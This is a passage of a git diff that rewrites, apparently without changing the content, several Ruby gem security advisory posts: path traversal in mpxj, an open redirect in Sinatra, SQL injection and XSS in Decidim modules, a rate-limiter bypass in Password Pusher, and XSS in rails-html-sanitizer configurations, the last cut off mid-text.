+    - https://github.com/advisories/GHSA-2rxp-v6pw-ch6m
+---
diff --git a/advisories/_posts/2024-10-28-CVE-2024-49771.md b/advisories/_posts/2024-10-28-CVE-2024-49771.md
index da1e4bd8..3919d146 100644
--- a/advisories/_posts/2024-10-28-CVE-2024-49771.md
+++ b/advisories/_posts/2024-10-28-CVE-2024-49771.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2024-49771 (mpxj): MPXJ has a Potential Path Traversal Vulnerability'
-comments: false
-categories:
-- mpxj
-advisory:
-  gem: mpxj
-  cve: 2024-49771
-  ghsa: j945-c44v-97g6
-  url: https://github.com/joniles/mpxj/security/advisories/GHSA-j945-c44v-97g6
-  title: MPXJ has a Potential Path Traversal Vulnerability
-  date: 2024-10-28
-  description: |
-    ### Impact
-
-    The patch for the historical vulnerability CVE-2020-35460 in MPXJ
-    is incomplete as there is still a possibility that a malicious path
-    could be constructed which would not be picked up by the original
-    fix and allow files to be written to arbitrary locations.
-
-    ### Patches
-
-    The issue is addressed in MPXJ version 13.5.1
-
-    ### Workarounds
-
-    Do not pass zip files to MPXJ.
-
-    ### References
-    N/A
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 8.3.5"
-  patched_versions:
-  - ">= 13.5.1"
-  related:
-    url:
-    - https://github.com/joniles/mpxj/security/advisories/GHSA-j945-c44v-97g6
-    - https://github.com/joniles/mpxj/commit/8002802890dfdc8bc74259f37e053e15b827eea0
-    - https://github.com/advisories/GHSA-j945-c44v-97g6
----
+---
+layout: advisory
+title: 'CVE-2024-49771 (mpxj): MPXJ has a Potential Path Traversal Vulnerability'
+comments: false
+categories:
+- mpxj
+advisory:
+  gem: mpxj
+  cve: 2024-49771
+  ghsa: j945-c44v-97g6
+  url: https://github.com/joniles/mpxj/security/advisories/GHSA-j945-c44v-97g6
+  title: MPXJ has a Potential Path Traversal Vulnerability
+  date: 2024-10-28
+  description: |
+    ### Impact
+
+    The patch for the historical vulnerability CVE-2020-35460 in MPXJ
+    is incomplete as there is still a possibility that a malicious path
+    could be constructed which would not be picked up by the original
+    fix and allow files to be written to arbitrary locations.
+
+    ### Patches
+
+    The issue is addressed in MPXJ version 13.5.1
+
+    ### Workarounds
+
+    Do not pass zip files to MPXJ.
+
+    ### References
+    N/A
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 8.3.5"
+  patched_versions:
+  - ">= 13.5.1"
+  related:
+    url:
+    - https://github.com/joniles/mpxj/security/advisories/GHSA-j945-c44v-97g6
+    - https://github.com/joniles/mpxj/commit/8002802890dfdc8bc74259f37e053e15b827eea0
+    - https://github.com/advisories/GHSA-j945-c44v-97g6
+---
diff --git a/advisories/_posts/2024-11-01-CVE-2024-21510.md b/advisories/_posts/2024-11-01-CVE-2024-21510.md
index 9a4d8901..661d75b7 100644
--- a/advisories/_posts/2024-11-01-CVE-2024-21510.md
+++ b/advisories/_posts/2024-11-01-CVE-2024-21510.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2024-21510 (sinatra): Sinatra vulnerable to Reliance on Untrusted Inputs
-  in a Security Decision'
-comments: false
-categories:
-- sinatra
-advisory:
-  gem: sinatra
-  cve: 2024-21510
-  ghsa: hxx2-7vcw-mqr3
-  url: https://github.com/advisories/GHSA-hxx2-7vcw-mqr3
-  title: Sinatra vulnerable to Reliance on Untrusted Inputs in a Security Decision
-  date: 2024-11-01
-  description: |
-    Versions of the package sinatra from 0.0.0 are vulnerable to
-    Reliance on Untrusted Inputs in a Security Decision via the
-    X-Forwarded-Host (XFH) header.
-
-    When making a request to a method with redirect applied, it is
-    possible to trigger an Open Redirect Attack by inserting an
-    arbitrary address into this header. If used for caching purposes,
-    such as with servers like Nginx, or as a reverse proxy, without
-    handling the X-Forwarded-Host header, attackers can potentially
-    exploit Cache Poisoning or Routing-based SSRF.
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 4.1.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-21510
-    - https://security.snyk.io/vuln/SNYK-RUBY-SINATRA-6483832
-    - https://github.com/advisories/GHSA-hxx2-7vcw-mqr3
-    - https://github.com/sinatra/sinatra/blob/b626e2d82c23b4fde0b51782fd32ca27ccde1d1a/lib/sinatra/base.rb#L319
-    - https://github.com/sinatra/sinatra/blob/b626e2d82c23b4fde0b51782fd32ca27ccde1d1a/lib/sinatra/base.rb#L323C1-L343C17
-    - https://github.com/sinatra/sinatra/issues/2052
-    - https://github.com/sinatra/sinatra/pull/2010
-    - https://github.com/sinatra/sinatra/pull/2053
-    - https://github.com/sinatra/sinatra/commit/cd3e00de20ddaff34ea30f7a74a7b9dad189d1d8
----
+---
+layout: advisory
+title: 'CVE-2024-21510 (sinatra): Sinatra vulnerable to Reliance on Untrusted Inputs
+  in a Security Decision'
+comments: false
+categories:
+- sinatra
+advisory:
+  gem: sinatra
+  cve: 2024-21510
+  ghsa: hxx2-7vcw-mqr3
+  url: https://github.com/advisories/GHSA-hxx2-7vcw-mqr3
+  title: Sinatra vulnerable to Reliance on Untrusted Inputs in a Security Decision
+  date: 2024-11-01
+  description: |
+    Versions of the package sinatra from 0.0.0 are vulnerable to
+    Reliance on Untrusted Inputs in a Security Decision via the
+    X-Forwarded-Host (XFH) header.
+
+    When making a request to a method with redirect applied, it is
+    possible to trigger an Open Redirect Attack by inserting an
+    arbitrary address into this header. If used for caching purposes,
+    such as with servers like Nginx, or as a reverse proxy, without
+    handling the X-Forwarded-Host header, attackers can potentially
+    exploit Cache Poisoning or Routing-based SSRF.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 4.1.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-21510
+    - https://security.snyk.io/vuln/SNYK-RUBY-SINATRA-6483832
+    - https://github.com/advisories/GHSA-hxx2-7vcw-mqr3
+    - https://github.com/sinatra/sinatra/blob/b626e2d82c23b4fde0b51782fd32ca27ccde1d1a/lib/sinatra/base.rb#L319
+    - https://github.com/sinatra/sinatra/blob/b626e2d82c23b4fde0b51782fd32ca27ccde1d1a/lib/sinatra/base.rb#L323C1-L343C17
+    - https://github.com/sinatra/sinatra/issues/2052
+    - https://github.com/sinatra/sinatra/pull/2010
+    - https://github.com/sinatra/sinatra/pull/2053
+    - https://github.com/sinatra/sinatra/commit/cd3e00de20ddaff34ea30f7a74a7b9dad189d1d8
+---
diff --git a/advisories/_posts/2024-11-12-CVE-2024-43415.md b/advisories/_posts/2024-11-12-CVE-2024-43415.md
index 5b1555d8..52838ade 100644
--- a/advisories/_posts/2024-11-12-CVE-2024-43415.md
+++ b/advisories/_posts/2024-11-12-CVE-2024-43415.md
@@ -1,75 +1,75 @@
----
-layout: advisory
-title: 'CVE-2024-43415 (decidim-decidim_awesome): Decidim-Awesome has SQL injection
-  in AdminAccountability'
-comments: false
-categories:
-- decidim-decidim_awesome
-advisory:
-  gem: decidim-decidim_awesome
-  cve: 2024-43415
-  ghsa: cxwf-qc32-375f
-  url: https://github.com/decidim-ice/decidim-module-decidim_awesome/security/advisories/GHSA-cxwf-qc32-375f
-  title: Decidim-Awesome has SQL injection in AdminAccountability
-  date: 2024-11-12
-  description: |
-    ## Vulnerability type: CWE-89: Improper Neutralization of Special
-
-    Elements used in an SQL Command ('SQL Injection')
-
-    ## Vendor:
-
-    Decidim International
-    Community Environment
-
-    ### Has vendor confirmed: Yes
-
-    ### Attack type: Remote
-
-    ### Impact:
-
-    Code Execution
-    Escalation of Privileges
-    Information Disclosure
-
-    ### Affected component:
-
-    A raw sql-statement that uses an interpolated variable
-    exists in the admin_role_actions method of the
-    `papertrail/version-model(app/models/decidim/decidim_awesome/paper_trail_version.rb`).
-
-    ### Attack vector:
-
-    An attacker with admin permissions could manipulate database queries
-    in order to read out the database, read files from the filesystem,
-    write files from the filesystem. In the worst case, this could lead
-    to remote code execution on the server.
-
-    Description of the vulnerability for use in the CVE
-    [ℹ] (https://cveproject.github.io/docs/content/key-details-\nphrasing.pdf):
-      An improper neutralization of special elements used in an SQL
-      command in the `papertrail/version-\nmodel` of the
-      decidim_awesome-module <= v0.11.1 (> 0.9.0) allows an authenticated
-      admin user to manipulate sql queries\nto disclose information,
-      read and write files or execute commands.
-
-    ### Discoverer Credits: Wolfgang Hotwagner
-
-    ### References:
-
-    https://pentest.ait.ac.at/security-advisory/decidim-awesome-sql-injection-in-adminaccountability
-    https://portswigger.net/web-security/sql-injection
-  cvss_v3: 9.0
-  unaffected_versions:
-  - "< 0.11.0"
-  patched_versions:
-  - "~> 0.10.3"
-  - ">= 0.11.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-43415
-    - https://github.com/decidim-ice/decidim-module-decidim_awesome/commit/84374037d34a3ac80dc18406834169c65869f11b
-    - https://github.com/decidim-ice/decidim-module-decidim_awesome/security/advisories/GHSA-cxwf-qc32-375f
-    - https://pentest.ait.ac.at/security-advisory/decidim-awesome-sql-injection-in-adminaccountability
-    - https://github.com/advisories/GHSA-cxwf-qc32-375f
----
+---
+layout: advisory
+title: 'CVE-2024-43415 (decidim-decidim_awesome): Decidim-Awesome has SQL injection
+  in AdminAccountability'
+comments: false
+categories:
+- decidim-decidim_awesome
+advisory:
+  gem: decidim-decidim_awesome
+  cve: 2024-43415
+  ghsa: cxwf-qc32-375f
+  url: https://github.com/decidim-ice/decidim-module-decidim_awesome/security/advisories/GHSA-cxwf-qc32-375f
+  title: Decidim-Awesome has SQL injection in AdminAccountability
+  date: 2024-11-12
+  description: |
+    ## Vulnerability type: CWE-89: Improper Neutralization of Special
+
+    Elements used in an SQL Command ('SQL Injection')
+
+    ## Vendor:
+
+    Decidim International
+    Community Environment
+
+    ### Has vendor confirmed: Yes
+
+    ### Attack type: Remote
+
+    ### Impact:
+
+    Code Execution
+    Escalation of Privileges
+    Information Disclosure
+
+    ### Affected component:
+
+    A raw sql-statement that uses an interpolated variable
+    exists in the admin_role_actions method of the
+    `papertrail/version-model(app/models/decidim/decidim_awesome/paper_trail_version.rb`).
+
+    ### Attack vector:
+
+    An attacker with admin permissions could manipulate database queries
+    in order to read out the database, read files from the filesystem,
+    write files from the filesystem. In the worst case, this could lead
+    to remote code execution on the server.
+
+    Description of the vulnerability for use in the CVE
+    [ℹ] (https://cveproject.github.io/docs/content/key-details-\nphrasing.pdf):
+      An improper neutralization of special elements used in an SQL
+      command in the `papertrail/version-\nmodel` of the
+      decidim_awesome-module <= v0.11.1 (> 0.9.0) allows an authenticated
+      admin user to manipulate sql queries\nto disclose information,
+      read and write files or execute commands.
+
+    ### Discoverer Credits: Wolfgang Hotwagner
+
+    ### References:
+
+    https://pentest.ait.ac.at/security-advisory/decidim-awesome-sql-injection-in-adminaccountability
+    https://portswigger.net/web-security/sql-injection
+  cvss_v3: 9.0
+  unaffected_versions:
+  - "< 0.11.0"
+  patched_versions:
+  - "~> 0.10.3"
+  - ">= 0.11.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43415
+    - https://github.com/decidim-ice/decidim-module-decidim_awesome/commit/84374037d34a3ac80dc18406834169c65869f11b
+    - https://github.com/decidim-ice/decidim-module-decidim_awesome/security/advisories/GHSA-cxwf-qc32-375f
+    - https://pentest.ait.ac.at/security-advisory/decidim-awesome-sql-injection-in-adminaccountability
+    - https://github.com/advisories/GHSA-cxwf-qc32-375f
+---
diff --git a/advisories/_posts/2024-11-13-CVE-2024-45594.md b/advisories/_posts/2024-11-13-CVE-2024-45594.md
index ec7f99e2..609eca2d 100644
--- a/advisories/_posts/2024-11-13-CVE-2024-45594.md
+++ b/advisories/_posts/2024-11-13-CVE-2024-45594.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2024-45594 (decidim-meetings): decidim-meetings Cross-site scripting vulnerability
-  in the online or hybrid meeting embeds'
-comments: false
-categories:
-- decidim-meetings
-advisory:
-  gem: decidim-meetings
-  cve: 2024-45594
-  ghsa: j4h6-gcj7-7v9v
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-j4h6-gcj7-7v9v
-  title: decidim-meetings Cross-site scripting vulnerability in the online or hybrid
-    meeting embeds
-  date: 2024-11-13
-  description: |
-    ### Impact
-
-    The meeting embeds feature used in the online or hybrid meetings
-    is subject to potential XSS attack through a malformed URL.
-
-    ### Workarounds
-
-    Disable the creation of meetings by participants in the meeting component.
-
-    ### References
-
-    OWASP ASVS v4.0.3-5.1.3
-
-    ### Credits
-
-    This issue was discovered in a security audit organized by mitgestalten
-    Partizipationsbüro against Decidim. The security audit was implemented
-    by the Austrian Institute of Technology.
-  cvss_v3: 7.7
-  unaffected_versions:
-  - "< 0.28.0"
-  patched_versions:
-  - "~> 0.28.3"
-  - ">= 0.29.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-45594
-    - https://github.com/decidim/decidim/releases/tag/v0.28.3
-    - https://github.com/decidim/decidim/security/advisories/GHSA-j4h6-gcj7-7v9v
-    - https://github.com/advisories/GHSA-j4h6-gcj7-7v9v
----
+---
+layout: advisory
+title: 'CVE-2024-45594 (decidim-meetings): decidim-meetings Cross-site scripting vulnerability
+  in the online or hybrid meeting embeds'
+comments: false
+categories:
+- decidim-meetings
+advisory:
+  gem: decidim-meetings
+  cve: 2024-45594
+  ghsa: j4h6-gcj7-7v9v
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-j4h6-gcj7-7v9v
+  title: decidim-meetings Cross-site scripting vulnerability in the online or hybrid
+    meeting embeds
+  date: 2024-11-13
+  description: |
+    ### Impact
+
+    The meeting embeds feature used in the online or hybrid meetings
+    is subject to potential XSS attack through a malformed URL.
+
+    ### Workarounds
+
+    Disable the creation of meetings by participants in the meeting component.
+
+    ### References
+
+    OWASP ASVS v4.0.3-5.1.3
+
+    ### Credits
+
+    This issue was discovered in a security audit organized by mitgestalten
+    Partizipationsbüro against Decidim. The security audit was implemented
+    by the Austrian Institute of Technology.
+  cvss_v3: 7.7
+  unaffected_versions:
+  - "< 0.28.0"
+  patched_versions:
+  - "~> 0.28.3"
+  - ">= 0.29.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-45594
+    - https://github.com/decidim/decidim/releases/tag/v0.28.3
+    - https://github.com/decidim/decidim/security/advisories/GHSA-j4h6-gcj7-7v9v
+    - https://github.com/advisories/GHSA-j4h6-gcj7-7v9v
+---
diff --git a/advisories/_posts/2024-11-20-CVE-2024-52796.md b/advisories/_posts/2024-11-20-CVE-2024-52796.md
index aa79010e..f8c8602c 100644
--- a/advisories/_posts/2024-11-20-CVE-2024-52796.md
+++ b/advisories/_posts/2024-11-20-CVE-2024-52796.md
@@ -1,56 +1,56 @@
----
-layout: advisory
-title: 'CVE-2024-52796 (pwpush): Password Pusher rate limiter can be bypassed by forging
-  proxy headers'
-comments: false
-categories:
-- pwpush
-advisory:
-  gem: pwpush
-  cve: 2024-52796
-  ghsa: ffp2-8p2h-4m5j
-  url: https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-ffp2-8p2h-4m5j
-  title: Password Pusher rate limiter can be bypassed by forging proxy headers
-  date: 2024-11-20
-  description: |
-    ### Impact
-
-    Password Pusher comes with a configurable rate limiter.
-    In versions prior to [v1.49.0], the rate limiter could be bypassed by forging
-    proxy headers allowing bad actors to send unlimited traffic to the site
-    potentially causing a denial of service.
-
-    ### Patches
-
-    In [v1.49.0], a fix was implemented to only authorize proxies on local IPs which
-    resolves this issue.
-
-    If you are running a remote proxy, please see
-    [this documentation](https://docs.pwpush.com/docs/proxies/#trusted-proxies)
-    on how to authorize the IP address of your remote proxy.
-
-    ### Workarounds
-
-    It is highly suggested to upgrade to at least [v1.49.0] to mitigate this risk.
-
-    If for some reason you cannot immediately upgrade, the alternative
-    is that you can add rules to your proxy and/or firewall to not
-    accept external proxy headers such as `X-Forwarded-*` from clients.
-
-    ### References
-
-    The new settings are [configurable to authorize remote proxies][1].
-
-    [v1.49.0]: https://github.com/pglombardo/PasswordPusher/releases/tag/v1.49.0
-    [1]: https://docs.pwpush.com/docs/proxies/#trusted-proxies
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 1.49.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-52796
-    - https://github.com/pglombardo/PasswordPusher/releases/tag/v1.49.0
-    - https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-ffp2-8p2h-4m5j
-    - https://docs.pwpush.com/docs/proxies/#trusted-proxies
-    - https://github.com/advisories/GHSA-ffp2-8p2h-4m5j
----
+---
+layout: advisory
+title: 'CVE-2024-52796 (pwpush): Password Pusher rate limiter can be bypassed by forging
+  proxy headers'
+comments: false
+categories:
+- pwpush
+advisory:
+  gem: pwpush
+  cve: 2024-52796
+  ghsa: ffp2-8p2h-4m5j
+  url: https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-ffp2-8p2h-4m5j
+  title: Password Pusher rate limiter can be bypassed by forging proxy headers
+  date: 2024-11-20
+  description: |
+    ### Impact
+
+    Password Pusher comes with a configurable rate limiter.
+    In versions prior to [v1.49.0], the rate limiter could be bypassed by forging
+    proxy headers allowing bad actors to send unlimited traffic to the site
+    potentially causing a denial of service.
+
+    ### Patches
+
+    In [v1.49.0], a fix was implemented to only authorize proxies on local IPs which
+    resolves this issue.
+
+    If you are running a remote proxy, please see
+    [this documentation](https://docs.pwpush.com/docs/proxies/#trusted-proxies)
+    on how to authorize the IP address of your remote proxy.
+
+    ### Workarounds
+
+    It is highly suggested to upgrade to at least [v1.49.0] to mitigate this risk.
+
+    If for some reason you cannot immediately upgrade, the alternative
+    is that you can add rules to your proxy and/or firewall to not
+    accept external proxy headers such as `X-Forwarded-*` from clients.
+
+    ### References
+
+    The new settings are [configurable to authorize remote proxies][1].
+
+    [v1.49.0]: https://github.com/pglombardo/PasswordPusher/releases/tag/v1.49.0
+    [1]: https://docs.pwpush.com/docs/proxies/#trusted-proxies
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 1.49.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-52796
+    - https://github.com/pglombardo/PasswordPusher/releases/tag/v1.49.0
+    - https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-ffp2-8p2h-4m5j
+    - https://docs.pwpush.com/docs/proxies/#trusted-proxies
+    - https://github.com/advisories/GHSA-ffp2-8p2h-4m5j
+---
diff --git a/advisories/_posts/2024-12-02-CVE-2024-53985.md b/advisories/_posts/2024-12-02-CVE-2024-53985.md
index 391b50d9..491db92b 100644
--- a/advisories/_posts/2024-12-02-CVE-2024-53985.md
+++ b/advisories/_posts/2024-12-02-CVE-2024-53985.md
@@ -1,141 +1,141 @@
----
-layout: advisory
-title: 'CVE-2024-53985 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
-  with certain configurations'
-comments: false
-categories:
-- rails-html-sanitizer
-- rails
-advisory:
-  gem: rails-html-sanitizer
-  framework: rails
-  cve: 2024-53985
-  ghsa: w8gc-x259-rc7x
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-w8gc-x259-rc7x
-  title: rails-html-sanitizer has XSS vulnerability with certain configurations
-  date: 2024-12-02
-  description: |
-    ## Summary
-
-    There is a possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0 and
-    Nokogiri < 1.15.7, or 1.16.x < 1.16.8.
-
-    * Versions affected: 1.6.0
-    * Not affected: < 1.6.0
-    * Fixed versions: 1.6.1
-
-    Please note that the fix in v1.6.1 is to update the dependency on
-    Nokogiri to 1.15.7 or >= 1.16.8.
-
-    ## Impact
-
-    A possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer may allow an attacker to inject content if
-    HTML5 sanitization is enabled and the application developer has
-    overridden the sanitizer's allowed tags in either of the following ways:
-
-    * allow both "math" and "style" elements
-    * or allow both "svg" and "style" elements
-
-    Code is only impacted if Rails is configured to use HTML5 sanitization,
-    please see documentation for
-    [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-    for more information on these configuration options.
-
-    Code is only impacted if allowed tags are being overridden.
-    Applications may be doing this in a few different ways:
-
-    1. using application configuration to configure Action View
-       sanitizers' allowed tags:
-
-      ```ruby
-      # In config/application.rb
-      config.action_view.sanitized_allowed_tags = ["math", "style"]
-      # or
-      config.action_view.sanitized_allowed_tags = ["svg", "style"]
-      ```
-
-      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
-
-    2. using a `:tags` option to the Action View helper `sanitize`:
-
-      ```
-      <= sanitize @comment.body, tags: ["math", "style"] >
-      <# or>
-      <= sanitize @comment.body, tags: ["svg", "style"] >
-      ```
-
-      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
-
-    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
-
-      ```ruby
-      # class-level option
-      Rails::HTML5::SafeListSanitizer.allowed_tags = ["math", "style"]
-      # or
-      Rails::HTML5::SafeListSanitizer.allowed_tags = ["svg", "style"]
-      ```
-
-      (note that this class may also be referenced as
-      `Rails::Html::SafeListSanitizer`)
-
-    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer
-       instance method `sanitize`:
-
-      ```ruby
-      # instance-level option
-      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "style"])
-      # or
-      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["svg", "style"])
-      ```
-      (note that this class may also be referenced as `Rails::Html::SafeListSanitizer`)
-
-    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
-
-      ```ruby
-      ActionText::ContentHelper.allowed_tags = ["math", "style"]
-      # or
-      ActionText::ContentHelper.allowed_tags = ["svg", "style"]
-      ```
-
-    All users overriding the allowed tags by any of the above mechanisms
-    to include (("math" or "svg") and "style") should either upgrade or
-    use one of the workarounds.
-
-    ## Workarounds
-
-    Any one of the following actions will work around this issue:
-
-    - Remove "style" from the overridden allowed tags,
-    - Or, remove "math" and "svg" from the overridden allowed tags,
-    - Or, downgrade sanitization to HTML4 (see documentation for
-      [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
-      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
-      for more information)
-    - Or, independently upgrade Nokogiri to v1.15.7 or >= 1.16.8.
-
-    ## References
-
-    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
-    - Original report: https://hackerone.com/reports/2503220
-
-    ## Credit
-
-    This vulnerability was responsibly reported by HackerOne user
-    [@taise](https://hackerone.com/taise?type=user).
-  cvss_v4: 2.3
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 1.6.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-53985
-    - https://github.com/rails/rails-html-sanitizer/blob/v1.6.1/CHANGELOG.md
-    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-w8gc-x259-rc7x
-    - https://github.com/rails/rails-html-sanitizer/commit/b0220b8850d52199a15f83c472d175a4122dd7b1
-    - https://github.com/rails/rails-html-sanitizer/commit/cd18b0ef00aad1d4a9e1c5d860cd23f80f63c505
-    - https://github.com/advisories/GHSA-w8gc-x259-rc7x
----
+---
+layout: advisory
+title: 'CVE-2024-53985 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
+  with certain configurations'
+comments: false
+categories:
+- rails-html-sanitizer
+- rails
+advisory:
+  gem: rails-html-sanitizer
+  framework: rails
+  cve: 2024-53985
+  ghsa: w8gc-x259-rc7x
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-w8gc-x259-rc7x
+  title: rails-html-sanitizer has XSS vulnerability with certain configurations
+  date: 2024-12-02
+  description: |
+    ## Summary
+
+    There is a possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0 and
+    Nokogiri < 1.15.7, or 1.16.x < 1.16.8.
+
+    * Versions affected: 1.6.0
+    * Not affected: < 1.6.0
+    * Fixed versions: 1.6.1
+
+    Please note that the fix in v1.6.1 is to update the dependency on
+    Nokogiri to 1.15.7 or >= 1.16.8.
+
+    ## Impact
+
+    A possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer may allow an attacker to inject content if
+    HTML5 sanitization is enabled and the application developer has
+    overridden the sanitizer's allowed tags in either of the following ways:
+
+    * allow both "math" and "style" elements
+    * or allow both "svg" and "style" elements
+
+    Code is only impacted if Rails is configured to use HTML5 sanitization,
+    please see documentation for
+    [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+    for more information on these configuration options.
+
+    Code is only impacted if allowed tags are being overridden.
+    Applications may be doing this in a few different ways:
+
+    1. using application configuration to configure Action View
+       sanitizers' allowed tags:
+
+      ```ruby
+      # In config/application.rb
+      config.action_view.sanitized_allowed_tags = ["math", "style"]
+      # or
+      config.action_view.sanitized_allowed_tags = ["svg", "style"]
+      ```
+
+      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
+
+    2. using a `:tags` option to the Action View helper `sanitize`:
+
+      ```
+      <= sanitize @comment.body, tags: ["math", "style"] >
+      <# or>
+      <= sanitize @comment.body, tags: ["svg", "style"] >
+      ```
+
+      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
+
+    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
+
+      ```ruby
+      # class-level option
+      Rails::HTML5::SafeListSanitizer.allowed_tags = ["math", "style"]
+      # or
+      Rails::HTML5::SafeListSanitizer.allowed_tags = ["svg", "style"]
+      ```
+
+      (note that this class may also be referenced as
+      `Rails::Html::SafeListSanitizer`)
+
+    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer
+       instance method `sanitize`:
+
+      ```ruby
+      # instance-level option
+      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["math", "style"])
+      # or
+      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["svg", "style"])
+      ```
+      (note that this class may also be referenced as `Rails::Html::SafeListSanitizer`)
+
+    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
+
+      ```ruby
+      ActionText::ContentHelper.allowed_tags = ["math", "style"]
+      # or
+      ActionText::ContentHelper.allowed_tags = ["svg", "style"]
+      ```
+
+    All users overriding the allowed tags by any of the above mechanisms
+    to include (("math" or "svg") and "style") should either upgrade or
+    use one of the workarounds.
+
+    ## Workarounds
+
+    Any one of the following actions will work around this issue:
+
+    - Remove "style" from the overridden allowed tags,
+    - Or, remove "math" and "svg" from the overridden allowed tags,
+    - Or, downgrade sanitization to HTML4 (see documentation for
+      [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+      for more information)
+    - Or, independently upgrade Nokogiri to v1.15.7 or >= 1.16.8.
+
+    ## References
+
+    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
+    - Original report: https://hackerone.com/reports/2503220
+
+    ## Credit
+
+    This vulnerability was responsibly reported by HackerOne user
+    [@taise](https://hackerone.com/taise?type=user).
+  cvss_v4: 2.3
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 1.6.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-53985
+    - https://github.com/rails/rails-html-sanitizer/blob/v1.6.1/CHANGELOG.md
+    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-w8gc-x259-rc7x
+    - https://github.com/rails/rails-html-sanitizer/commit/b0220b8850d52199a15f83c472d175a4122dd7b1
+    - https://github.com/rails/rails-html-sanitizer/commit/cd18b0ef00aad1d4a9e1c5d860cd23f80f63c505
+    - https://github.com/advisories/GHSA-w8gc-x259-rc7x
+---
diff --git a/advisories/_posts/2024-12-02-CVE-2024-53986.md b/advisories/_posts/2024-12-02-CVE-2024-53986.md
index c8c22563..702239a8 100644
--- a/advisories/_posts/2024-12-02-CVE-2024-53986.md
+++ b/advisories/_posts/2024-12-02-CVE-2024-53986.md
@@ -1,126 +1,126 @@
----
-layout: advisory
-title: 'CVE-2024-53986 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
-  with certain configurations'
-comments: false
-categories:
-- rails-html-sanitizer
-- rails
-advisory:
-  gem: rails-html-sanitizer
-  framework: rails
-  cve: 2024-53986
-  ghsa: 638j-pmjw-jq48
-  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-638j-pmjw-jq48
-  title: rails-html-sanitizer has XSS vulnerability with certain configurations
-  date: 2024-12-02
-  description: |
-    ## Summary
-
-    There is a possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0.
-
-    * Versions affected: 1.6.0
-    * Not affected: < 1.6.0
-    * Fixed versions: 1.6.1
-
-    ## Impact
-
-    A possible XSS vulnerability with certain configurations of
-    Rails::HTML::Sanitizer may allow an attacker to inject content if
-    HTML5 sanitization is enabled and the application developer has
